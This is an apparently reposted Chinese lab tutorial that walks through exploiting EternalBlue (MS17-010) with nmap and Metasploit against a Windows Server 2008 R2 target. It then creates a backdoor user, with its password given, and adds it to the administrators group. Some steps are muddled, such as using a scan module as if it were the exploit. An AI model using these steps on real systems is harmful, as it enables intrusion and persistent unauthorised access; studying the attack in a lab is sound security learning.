永恒之蓝漏洞发现与利用

永恒之蓝恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

攻击机:kali linux
靶机:Windows sever2008 r2
kali和靶机要在同一个网段
我们打开kali

nmap -Pn(目标ip) 扫描目标端口开启情况,主要目标445
在这里插入图片描述
msfconsole 打开攻击软件
在这里插入图片描述
search ms17-010 查看漏洞利用模块
在这里插入图片描述
use 0(一共四个模块,第一个是扫描模块) 打开扫描模块

show options 打开目标设置界面,设置RHOSTS目标IP地址
在这里插入图片描述
set rhosts (目标ip) 设置目标IP地址 也是windows server2008 r2的ip
在这里插入图片描述
run 运行漏洞
在这里插入图片描述
net user king9 2000666zli. /add [在目标主机上创建一个名为king9的账户,密码 2000666zli.
在这里插入图片描述
目标主机被创建账户

因为是创建的用户 所有没有管理员权限,我们给他进行提权
kali下对win7提权

net localgroup administrators 账户名/add

然后我们登陆windows server2008r2
在这里插入图片描述

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
分享
二维码
< <上一篇
下一篇>>